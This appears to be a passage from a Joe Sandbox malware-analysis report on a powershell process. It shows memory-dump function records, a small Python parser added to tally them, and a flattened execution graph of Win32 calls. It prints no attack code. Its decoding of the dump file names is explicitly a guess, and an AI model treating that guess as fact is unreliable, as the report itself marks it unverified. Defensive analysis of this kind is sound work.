                                                                                • Instruction Fuzzy Hash: 8061783290DA5A4EE7199E2CEC458F6BBD4EF52230F14017EE5C9C31A2E91DA983C357

                                                                                Control-flow Graph

                                                                                 Control-flow graph figure (not recoverable as text): function at 7ffec8c78692 in the powershell dump region 0x7FFEC8C70000, basic blocks 7ffec8c78692 through 7ffec8c7897b; the rendered graph marks each block as executed or not executed.
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2627543105.00007FFEC8C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC8C70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffec8c70000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 31e90177e84ac7d68c3bce42ef8108b8bc12f77d8e8853b4f61e41ff06255b75
                                                                                • Instruction ID: b79a568c40024688de64c1690cb42f295e53a7d715050a36762d666ea2c518ba
                                                                                • Opcode Fuzzy Hash: 31e90177e84ac7d68c3bce42ef8108b8bc12f77d8e8853b4f61e41ff06255b75
                                                                                • Instruction Fuzzy Hash: 3541C331A186098FEB98EF28D8596FD7BE1EF55360F10007EE54DC32E2EE296841C741

                                                                                Control-flow Graph

                                                                                 Control-flow graph figure (not recoverable as text): function at 7ffec8a97ffb in the powershell dump region 0x7FFEC8A90000, basic blocks 7ffec8a97ffb through 7ffec8a980fa; the rendered graph marks each block as executed or not executed.
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2608299007.00007FFEC8A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC8A90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffec8a90000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3494b6dec6ce3eeb1d47abfe4d9da1f0d98522315b28bcaa3c4abe27b71795a4
                                                                                • Instruction ID: b2470403cd52493171f768f75dc9d11ae78f3d18b0b326e3b7dc232f1d2a473a
                                                                                • Opcode Fuzzy Hash: 3494b6dec6ce3eeb1d47abfe4d9da1f0d98522315b28bcaa3c4abe27b71795a4
                                                                                • Instruction Fuzzy Hash: C531B63060E7998FDB86EB28C8649657FB1EF9730471901EFE049CB1E3D91AAC45C792
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2608299007.00007FFEC8A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC8A90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffec8a90000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 81537a40c646df14f59b8300148dd0856b1172d00bec323c8bb4f0c4c8eb21d7
                                                                                • Instruction ID: 1920fc62dac26e8376eaf80ce2fb80e2bc6ea1a7339f5f633e75ea4fdc611f14
                                                                                • Opcode Fuzzy Hash: 81537a40c646df14f59b8300148dd0856b1172d00bec323c8bb4f0c4c8eb21d7
                                                                                • Instruction Fuzzy Hash: 2B31D230A0EA4A4FEB95DB58D45076277E1FF95314F5440BEE00DCB5A7CA2AED82C740
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2561123960.00007FFEC8620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC8620000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffec8620000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 17c934c55ef66d616e91070148337201487126c460ca871d29746b81a1a4a368
                                                                                • Instruction ID: 789345bd1ecc0c90e165698fa62718f093b0e37a1cb76ed746941712ff6644bf
                                                                                • Opcode Fuzzy Hash: 17c934c55ef66d616e91070148337201487126c460ca871d29746b81a1a4a368
                                                                                • Instruction Fuzzy Hash: CC21B06290EBC21FD7A75B2818641A07FE0EF5726135A02FBD4C8CB0E3ED0C6D468366
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2561123960.00007FFEC8620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC8620000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffec8620000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1f45b9cee68d91e6edfab886458aa4c8b865bcc11397096b154561610f6ef507
                                                                                • Instruction ID: c370555f7995bc240f28a04b2bbe35e380d3dc5309f0e72a87390a2bef1baf29
                                                                                • Opcode Fuzzy Hash: 1f45b9cee68d91e6edfab886458aa4c8b865bcc11397096b154561610f6ef507
                                                                                • Instruction Fuzzy Hash: 2B012D22F1DE6A5FE39BE71C14142B9A6E2FFD82217A801FBD48DC32A6DD15DD418341
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2608299007.00007FFEC8A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC8A90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffec8a90000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d59a1422d6c9ec4370f3c6b42b9f17af95c3e6d3ff2b5905cd1a8d29c3e68473
                                                                                • Instruction ID: 9d535de0502b8cac6902bae84d79f36e53776014dad1b22c6484f576307d4bb6
                                                                                • Opcode Fuzzy Hash: d59a1422d6c9ec4370f3c6b42b9f17af95c3e6d3ff2b5905cd1a8d29c3e68473
                                                                                • Instruction Fuzzy Hash: B8E02612B5CC0D0E98C4FE5C28015F9B3C1EB98210750067BE40EC22D7DC28B9854384
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2561123960.00007FFEC8620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC8620000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffec8620000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b1346604dd16f8d52a384534f149dea52eded0f5b7df2cccc0807d7ad2e82ead
                                                                                • Instruction ID: 5ecc41cd6d8fcf85e61cd66ea6afccef9d9b0ed26fb1469afef8aff950ce6137
                                                                                • Opcode Fuzzy Hash: b1346604dd16f8d52a384534f149dea52eded0f5b7df2cccc0807d7ad2e82ead
                                                                                • Instruction Fuzzy Hash: 4AE09251B1DBC66FE757B7384824239A9E1AF8620179800FEE0C8C62F3DD199E418301
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2561123960.00007FFEC8620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC8620000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ffec8620000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cdf02499ebbb75611dc73b35defec694cbbfb2684ffa25bc6571453357641d04
                                                                                • Instruction ID: 3ec63a67c40fc63074c312ee5ca92b2ee71c31d8ad3a4f7cd402b259bce73a23
                                                                                • Opcode Fuzzy Hash: cdf02499ebbb75611dc73b35defec694cbbfb2684ffa25bc6571453357641d04
                                                                                • Instruction Fuzzy Hash: 88E09A32A185198FDB88EB58E94A9E9B3E0FF08210B9000F6F10CD34B2CA25A811C704
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2561123960.00007FFEC8620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC8620000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ffec8620000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b5affe399cf0e396a2c2c5eb4638103585393827eddfef40e93aab9f93f63e33
• Instruction ID: b34c4c682757da4cd148d6df9fe613bb347fdc9853d634f8d6afb2e8f9f2cec6
• Opcode Fuzzy Hash: b5affe399cf0e396a2c2c5eb4638103585393827eddfef40e93aab9f93f63e33
• Instruction Fuzzy Hash: E5D01730A14E2E4EE38AAA28010827650C2EFD820276054B9A44EC72A9DD39E9828205
Memory Dump Source
• Source File: 0000000A.00000002.2561123960.00007FFEC8620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC8620000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ffec8620000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 90f0a7a6904c20a8d96896f5f77280e38616a53cb7f7024d6d940626ef03b1c9
• Instruction ID: 7c70889cdc460424ec8e2a470622ded1ae4ce49f546aa10062c22461f8e358ae
• Opcode Fuzzy Hash: 90f0a7a6904c20a8d96896f5f77280e38616a53cb7f7024d6d940626ef03b1c9
• Instruction Fuzzy Hash: 70C01230B19A1A4ED799A734451467450D2AF8920175004FCA00DC22E2EC399802C704
Memory Dump Source
• Source File: 0000000A.00000002.2567791066.00007FFEC86D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC86D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ffec86d0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3dcebe17a755646672dc7d0d7343ff2b31bd16ae6ddb749be7c62e0e5116e7da
• Instruction ID: 93ac6ab8d5e549bae907c2aa346b2cf428663971547f848524b2fc8f73bddd56
• Opcode Fuzzy Hash: 3dcebe17a755646672dc7d0d7343ff2b31bd16ae6ddb749be7c62e0e5116e7da
• Instruction Fuzzy Hash: 85228234A18A498FD399EF3880553BAB6D2EF89305F5085BDA04EC72A3DE79D942C744
Memory Dump Source
• Source File: 0000000A.00000002.2567791066.00007FFEC86D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC86D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ffec86d0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5ffe0513879ada8de38cb10b4f61f20da3b02911c8d208f53a8f19fd19a42dd6
• Instruction ID: 35e13f92a2046f844188650909f656a0857605bfba71904744d5b3ebdd429030
• Opcode Fuzzy Hash: 5ffe0513879ada8de38cb10b4f61f20da3b02911c8d208f53a8f19fd19a42dd6
• Instruction Fuzzy Hash: CCB19370A2C6854FE34AEF38445637AB7D1EF89305F5585BDA08AC72A3DE39D402C746
Memory Dump Source
• Source File: 0000000A.00000002.2567791066.00007FFEC86D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC86D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ffec86d0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fa37258450807b2e45cecc4254def65407dc0e6348bdbeb3248eecd02d07a682
• Instruction ID: 812cb9829a162367515071cc767505a7a4717d715aed31aa4c77ace0db602ade
• Opcode Fuzzy Hash: fa37258450807b2e45cecc4254def65407dc0e6348bdbeb3248eecd02d07a682
• Instruction Fuzzy Hash: 9DA1C670A186884FE389EF38445537ABBD1EF8D215F5586BEA08EC72A3DE38D402C305
Memory Dump Source
• Source File: 0000000A.00000002.2567791066.00007FFEC86D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC86D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ffec86d0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ebf7f6ec4d34d4ab50dfcb989c166eebc9682938436613ff815d587fd54398e6
• Instruction ID: df502e8da41e44590b1aa0fc74bef415a863f501c53097b0baf15f50dfc2a8a7
• Opcode Fuzzy Hash: ebf7f6ec4d34d4ab50dfcb989c166eebc9682938436613ff815d587fd54398e6
• Instruction Fuzzy Hash: 5F51A470A2DA854FD34AEF38445537ABBD1EF89209F5485BEE08EC72A3DE39D4028345
Memory Dump Source
• Source File: 0000000A.00000002.2627543105.00007FFEC8C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC8C70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ffec8c70000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0900aae68c6b314c4a7bd6dbf811126306d25bb7cc0e5de7b6f897123bb8c112
• Instruction ID: 89c0b5dbc68f7ae4d1bb5b907d76e2733ae03882894e5b572a4dda16b1c0a7a7
• Opcode Fuzzy Hash: 0900aae68c6b314c4a7bd6dbf811126306d25bb7cc0e5de7b6f897123bb8c112
• Instruction Fuzzy Hash: E351F05048F7C22EC79397B499685923FFA9D87130B0E81EBD5C8CE4A7D58E084AC363
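The records above are the Joe Sandbox IDA plugin's per-function entries: for every function carved out of a memory dump they give the dump file, the region base (Offset), whether a PE header was found at that base, and two identifier/fuzzy-hash pairs that can be matched against other reports. On this page every Opcode ID equals its Opcode Fuzzy Hash and the three Similarity fields are empty. The parser below is an added example, not Joe Sandbox code: it turns such a listing into dicts, counts functions per dumped region and checks the opcode-field consistency. The three records embedded in it are copied verbatim from this page. The decoding in describe_dump_name is an assumption inferred from the names themselves: the first two fields of the .sdmp name match the 10 and 2 in the snapshot file name, the fourth matches the Offset, and the fifth is read as the region's page protection (0x40 is PAGE_EXECUTE_READWRITE in winnt.h). Read that way, "based on PE: false" plus an RWX region inside powershell is what code unpacked at runtime, rather than mapped from an image on disk, looks like.

```python
"""Parse the per-function 'Memory Dump Source' records of a Joe Sandbox report
and summarise which dumped regions the functions came from.
Added example; not code from Joe Sandbox."""
from collections import Counter

# Three records copied verbatim from this report (indentation is irrelevant to the parser).
SAMPLE_RECORDS = """Memory Dump Source
• Source File: 0000000A.00000002.2567791066.00007FFEC86D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC86D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ffec86d0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3dcebe17a755646672dc7d0d7343ff2b31bd16ae6ddb749be7c62e0e5116e7da
• Instruction ID: 93ac6ab8d5e549bae907c2aa346b2cf428663971547f848524b2fc8f73bddd56
• Opcode Fuzzy Hash: 3dcebe17a755646672dc7d0d7343ff2b31bd16ae6ddb749be7c62e0e5116e7da
• Instruction Fuzzy Hash: 85228234A18A498FD399EF3880553BAB6D2EF89305F5085BDA04EC72A3DE79D942C744
Memory Dump Source
• Source File: 0000000A.00000002.2567791066.00007FFEC86D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC86D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ffec86d0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5ffe0513879ada8de38cb10b4f61f20da3b02911c8d208f53a8f19fd19a42dd6
• Instruction ID: 35e13f92a2046f844188650909f656a0857605bfba71904744d5b3ebdd429030
• Opcode Fuzzy Hash: 5ffe0513879ada8de38cb10b4f61f20da3b02911c8d208f53a8f19fd19a42dd6
• Instruction Fuzzy Hash: CCB19370A2C6854FE34AEF38445637AB7D1EF89305F5585BDA08AC72A3DE39D402C746
Memory Dump Source
• Source File: 0000000A.00000002.2627543105.00007FFEC8C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC8C70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ffec8c70000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0900aae68c6b314c4a7bd6dbf811126306d25bb7cc0e5de7b6f897123bb8c112
• Instruction ID: 89c0b5dbc68f7ae4d1bb5b907d76e2733ae03882894e5b572a4dda16b1c0a7a7
• Opcode Fuzzy Hash: 0900aae68c6b314c4a7bd6dbf811126306d25bb7cc0e5de7b6f897123bb8c112
• Instruction Fuzzy Hash: E351F05048F7C22EC79397B499685923FFA9D87130B0E81EBD5C8CE4A7D58E084AC363
"""

# Windows PAGE_* protection constants from winnt.h.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}


def parse_memory_dump_records(text):
    """Split the report text into one dict per function record."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line == "Memory Dump Source":  # caption that opens a new record
            current = {}
            records.append(current)
            continue
        if ":" not in line:  # other captions: "Similarity", "Joe Sandbox IDA Plugin"
            continue
        if current is None:  # a record whose opening caption was cut off
            current = {}
            records.append(current)
        # "Source File: X, Offset: Y, based on PE: Z" carries three fields on one line
        parts = line.split(", ") if line.startswith("Source File:") else [line]
        for part in parts:
            key, _, value = part.partition(":")
            current[key.strip()] = value.strip()
    return records


def describe_dump_name(name):
    """Decode the dot-separated .sdmp name. ASSUMPTION (inferred from the snapshot name
    hcaresult_10_2_...): field 1 is the process index, field 2 the dump index,
    field 4 the region base and field 5 the region's page protection."""
    f = name.split(".")
    protect = int(f[4], 16)
    return {"process_index": int(f[0], 16), "dump_index": int(f[1], 16),
            "base": f[3], "protect": PAGE_PROTECT.get(protect, hex(protect))}


def summarize(records):
    """Functions per dumped region, plus indexes of records whose two opcode fields disagree."""
    per_region = Counter((r["Source File"], r["based on PE"]) for r in records)
    mismatched = [i for i, r in enumerate(records) if r["Opcode ID"] != r["Opcode Fuzzy Hash"]]
    return per_region, mismatched


if __name__ == "__main__":
    recs = parse_memory_dump_records(SAMPLE_RECORDS)
    per_region, bad = summarize(recs)
    for (src, is_pe), n in per_region.items():
        print(f"{n} function(s) from {src} (PE-backed: {is_pe}) -> {describe_dump_name(src)}")
    print("records with disagreeing opcode fields:", bad)
```

Feeding the whole listing of a report through parse_memory_dump_records gives a per-region function count; the Instruction Fuzzy Hash values are the field to index when pivoting between reports, since Opcode ID and Opcode Fuzzy Hash carry the same value here.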

Execution Graph

Execution Coverage: 6.7%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 14.5%
Total number of Nodes: 2000
Total number of Limit Nodes: 78
execution_graph: flattened export of the interactive execution graph, rendered here as a flat token list (node id, code address, API or symbol labels, and id->id edges). The exported fragment starts at 110179e0 (GetTickCount) and its nodes reference, among others, the Win32 calls GetTickCount, CoInitialize, CoUninitialize, WaitForSingleObject, SetEvent, ResetEvent, WaitForMultipleObjects, IsDebuggerPresent, OutputDebugStringA, GetLastError, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, ExitProcess, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, GetProcAddress, GetModuleFileNameA, GetTokenInformation, CloseHandle, RegOpenKeyExA, RegQueryValueExA, RegCloseKey, SHGetFolderPathA, GetFileAttributesA, CreateDirectoryA, RtlAllocateHeap, HeapFree, Sleep, DecodePointer, InitializeCriticalSection, InitializeCriticalSectionAndSpinCount, EnterCriticalSection, LeaveCriticalSection, GetCurrentThreadId, MultiByteToWideChar, WideCharToMultiByte, IsDBCSLeadByte, wsprintfA, wvsprintfA, LoadStringA, GetLocaleInfoA and GetLocaleInfoW, alongside CRT and STL symbols such as _malloc, _free, _memset, _strrchr and std::locale::_Init. The export continues beyond this excerpt.
API calls 63515 11030f5e 63514->63515 63516 111648ed std::locale::_Init 77 API calls 63515->63516 63517 11030f6d 63516->63517 63519 11030f86 63517->63519 63521 111648ed std::locale::_Init 77 API calls 63517->63521 63520 110312db GetStockObject GetObjectA 63518->63520 63523 11163ca7 std::locale::_Init 77 API calls 63519->63523 63522 1103130a SetErrorMode SetErrorMode 63520->63522 63521->63517 63525 111101b0 std::locale::_Init 274 API calls 63522->63525 63527 11030f92 63523->63527 63526 11031346 63525->63526 63584 11028980 63526->63584 63527->63511 63528 11143bd0 std::locale::_Init RegQueryValueExA 63527->63528 63531 11030fe8 63528->63531 63530 11031360 63533 111101b0 std::locale::_Init 274 API calls 63530->63533 63532 11143bd0 std::locale::_Init RegQueryValueExA 63531->63532 63534 11031011 63532->63534 63535 11031386 63533->63535 63534->63511 63536 11028980 278 API calls 63535->63536 63537 1103139f InterlockedExchange 63536->63537 63539 111101b0 std::locale::_Init 274 API calls 63537->63539 63540 110313c7 63539->63540 63587 1108a880 63540->63587 63542 110313df GetACP 63598 11163f93 63542->63598 63547 11031410 63645 11143780 63547->63645 63550 111101b0 std::locale::_Init 274 API calls 63551 1103145c 63550->63551 63651 11061aa0 63551->63651 63553 110314d4 63557 111101b0 std::locale::_Init 274 API calls 63553->63557 63555 111101b0 std::locale::_Init 274 API calls 63556 110314ae 63555->63556 63712 11061710 63556->63712 63559 11031501 63557->63559 63668 11125d40 63559->63668 63561 11031523 63562 111101b0 std::locale::_Init 274 API calls 63561->63562 63563 1103155b 63562->63563 63677 11088b30 63563->63677 63583 11030f4a 63582->63583 63583->63511 63583->63514 63585 11088b30 278 API calls 63584->63585 63586 1102898b _memset 63585->63586 63586->63530 63588 111101b0 std::locale::_Init 274 API calls 63587->63588 63589 1108a8b7 63588->63589 63590 1108a8d9 InitializeCriticalSection 63589->63590 63591 111101b0 std::locale::_Init 274 API calls 63589->63591 63594 1108a93a 
63590->63594 63593 1108a8d2 63591->63593 63593->63590 63725 1116305a std::exception::_Copy_str 63593->63725 63594->63542 63596 1108a909 63726 111634b1 RaiseException 63596->63726 63599 11163fc6 63598->63599 63600 11163fb1 63598->63600 63599->63600 63601 11163fcd 63599->63601 63727 1116a1af 65 API calls __getptd_noexit 63600->63727 63729 1117027b 104 API calls 9 library calls 63601->63729 63604 11163fb6 63728 1116edc4 __call_reportfault GetCurrentProcess TerminateProcess DecodePointer __write 63604->63728 63605 11163ff3 63607 11031406 63605->63607 63730 111700e4 97 API calls 6 library calls 63605->63730 63609 111663a3 63607->63609 63610 111663af __write 63609->63610 63611 111663d0 63610->63611 63612 111663b9 63610->63612 63614 1116c675 __getptd 65 API calls 63611->63614 63763 1116a1af 65 API calls __getptd_noexit 63612->63763 63616 111663d5 63614->63616 63615 111663be 63764 1116edc4 __call_reportfault GetCurrentProcess TerminateProcess DecodePointer __write 63615->63764 63618 11171306 ___pctype_func 73 API calls 63616->63618 63619 111663df 63618->63619 63731 1116ac7e 63619->63731 63622 111663c9 __write _setlocale 63622->63547 63623 1117459f __lock 65 API calls 63624 1116640b 63623->63624 63737 11165814 63624->63737 63631 111664ec 63769 111710d5 8 API calls 63631->63769 63632 1116643b __setlocale_nolock 63635 1117459f __lock 65 API calls 63632->63635 63634 111664f2 63770 1117116e 65 API calls 4 library calls 63634->63770 63637 11166461 63635->63637 63765 111712b9 73 API calls 3 library calls 63637->63765 63639 11166473 63766 111710d5 8 API calls 63639->63766 63641 11166479 63644 11166497 63641->63644 63767 111712b9 73 API calls 3 library calls 63641->63767 63768 111664e1 LeaveCriticalSection _doexit 63644->63768 63955 11143690 63645->63955 63647 11166654 84 API calls std::locale::_Init 63649 11143795 63647->63649 63648 11143690 2 API calls 63648->63649 63649->63647 63649->63648 63650 1103143c 63649->63650 63650->63550 63652 11061710 304 API calls 63651->63652 63653 
11061ade 63652->63653 63654 111101b0 std::locale::_Init 274 API calls 63653->63654 63655 11061b0b 63654->63655 63656 11061b24 63655->63656 63657 11061710 304 API calls 63655->63657 63658 111101b0 std::locale::_Init 274 API calls 63656->63658 63657->63656 63659 11061b35 63658->63659 63660 11061710 304 API calls 63659->63660 63662 11061b4e 63659->63662 63660->63662 63661 11031487 63661->63553 63661->63555 63662->63661 63969 11061a70 63662->63969 63669 111101b0 std::locale::_Init 274 API calls 63668->63669 63670 11125d74 63669->63670 63671 11125da5 63670->63671 63672 11125d8a 63670->63672 63675 11125e08 63671->63675 64105 110717d0 278 API calls std::locale::_Init 63671->64105 64104 110765c0 477 API calls std::locale::_Init 63672->64104 63674 11125d9a 63674->63671 63675->63561 63713 111101b0 std::locale::_Init 274 API calls 63712->63713 63714 11061761 63713->63714 63715 11061777 InitializeCriticalSection 63714->63715 64451 11061210 276 API calls 3 library calls 63714->64451 63718 110617b7 63715->63718 63723 11061826 63715->63723 64452 1105f830 297 API calls 3 library calls 63718->64452 63720 110617d8 RegCreateKeyExA 63721 11061832 RegCreateKeyExA 63720->63721 63722 110617ff RegCreateKeyExA 63720->63722 63721->63723 63724 11061865 RegCreateKeyExA 63721->63724 63722->63721 63722->63723 63723->63553 63724->63723 63725->63596 63726->63590 63727->63604 63728->63607 63729->63605 63730->63607 63734 1116ac87 63731->63734 63733 111663f5 63733->63622 63733->63623 63734->63733 63735 1116aca5 Sleep 63734->63735 63771 11170fc4 63734->63771 63736 1116acba 63735->63736 63736->63733 63736->63734 63738 1116581d 63737->63738 63739 11165836 63737->63739 63738->63739 63782 11171046 8 API calls 63738->63782 63741 111664d5 63739->63741 63783 111744c6 LeaveCriticalSection 63741->63783 63743 11166422 63744 11166187 63743->63744 63745 111661b0 63744->63745 63751 111661cb 63744->63751 63747 111661ba 63745->63747 63750 11165e4d __setlocale_set_cat 112 API calls 63745->63750 63746 111662f5 
63746->63747 63848 11165ac7 63746->63848 63753 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 63747->63753 63748 1116631c 63784 11165c2c 63748->63784 63750->63747 63751->63746 63751->63748 63759 11166200 _strpbrk _strncmp _strcspn 63751->63759 63754 111663a1 63753->63754 63754->63631 63754->63632 63755 11166331 __setlocale_nolock 63755->63746 63755->63747 63801 11165e4d 63755->63801 63757 11166257 _strlen 63757->63759 63759->63746 63759->63747 63759->63757 63760 1116630e 63759->63760 63762 11165e4d __setlocale_set_cat 112 API calls 63759->63762 63877 111699f9 65 API calls __write 63759->63877 63878 1116ed72 __call_reportfault GetCurrentProcess TerminateProcess 63760->63878 63762->63759 63763->63615 63764->63622 63765->63639 63766->63641 63767->63644 63768->63622 63769->63634 63770->63622 63772 11170fd0 63771->63772 63778 11170feb 63771->63778 63773 11170fdc 63772->63773 63772->63778 63780 1116a1af 65 API calls __getptd_noexit 63773->63780 63775 11170ffe RtlAllocateHeap 63777 11171025 63775->63777 63775->63778 63776 11170fe1 63776->63734 63777->63734 63778->63775 63778->63777 63781 1116e368 DecodePointer 63778->63781 63780->63776 63781->63778 63782->63739 63783->63743 63785 1116c675 __getptd 65 API calls 63784->63785 63786 11165c67 63785->63786 63788 11165d07 _strlen 63786->63788 63790 1116cd5f _strcpy_s 65 API calls 63786->63790 63796 11165cd4 63786->63796 63787 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 63789 11165e4b 63787->63789 63792 11165ccd __setlocale_nolock 63788->63792 63789->63755 63790->63792 63793 11165de0 _memmove 63792->63793 63795 11165df9 _memmove 63792->63795 63792->63796 63798 1116cd5f _strcpy_s 65 API calls 63792->63798 63879 1116593d 63792->63879 63886 11174bcc 63792->63886 63921 1116ed72 __call_reportfault GetCurrentProcess TerminateProcess 63792->63921 63922 11165a5c 65 API calls 3 library calls 63792->63922 63923 111699f9 65 API calls __write 63792->63923 63793->63792 
63795->63792 63796->63787 63798->63792 63802 1116c675 __getptd 65 API calls 63801->63802 63803 11165e7a 63802->63803 63804 11165c2c __expandlocale 102 API calls 63803->63804 63806 11165ea2 __setlocale_nolock 63804->63806 63805 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 63807 11165eb7 63805->63807 63808 11165ea9 63806->63808 63809 11165ed8 _strlen 63806->63809 63807->63755 63808->63805 63810 1116ac39 __malloc_crt 65 API calls 63809->63810 63811 11165ef3 63810->63811 63811->63808 63812 11165eff _memmove 63811->63812 63813 1116cd5f _strcpy_s 65 API calls 63812->63813 63814 11165f66 63813->63814 63815 11165f71 _memmove 63814->63815 63830 11166155 63814->63830 63849 1116ac39 __malloc_crt 65 API calls 63848->63849 63850 11165ae0 63849->63850 63867 11165bb8 63850->63867 63951 111658fc 65 API calls 2 library calls 63850->63951 63853 11165bce 63954 1116ed72 __call_reportfault GetCurrentProcess TerminateProcess 63853->63954 63855 11165bda 63857 11163aa5 _free 65 API calls 63855->63857 63856 11165b11 __setlocale_nolock 63856->63853 63861 11165b7f 63856->63861 63952 111745d2 65 API calls __write 63856->63952 63953 111658fc 65 API calls 2 library calls 63856->63953 63859 11165be2 63857->63859 63860 11165bf2 InterlockedDecrement 63859->63860 63870 11165c01 63859->63870 63862 11165bf9 63860->63862 63860->63870 63861->63855 63864 11165b85 63861->63864 63865 11163aa5 _free 65 API calls 63862->63865 63863 11165c09 InterlockedDecrement 63866 11165c10 63863->63866 63863->63867 63868 11165ba1 63864->63868 63869 11165b92 InterlockedDecrement 63864->63869 63865->63870 63871 11163aa5 _free 65 API calls 63866->63871 63867->63747 63868->63867 63873 11165ba9 InterlockedDecrement 63868->63873 63869->63868 63872 11165b99 63869->63872 63870->63863 63870->63867 63871->63867 63874 11163aa5 _free 65 API calls 63872->63874 63873->63867 63875 11165bb0 63873->63875 63874->63868 63876 11163aa5 _free 65 API calls 63875->63876 63876->63867 63877->63759 63878->63747 
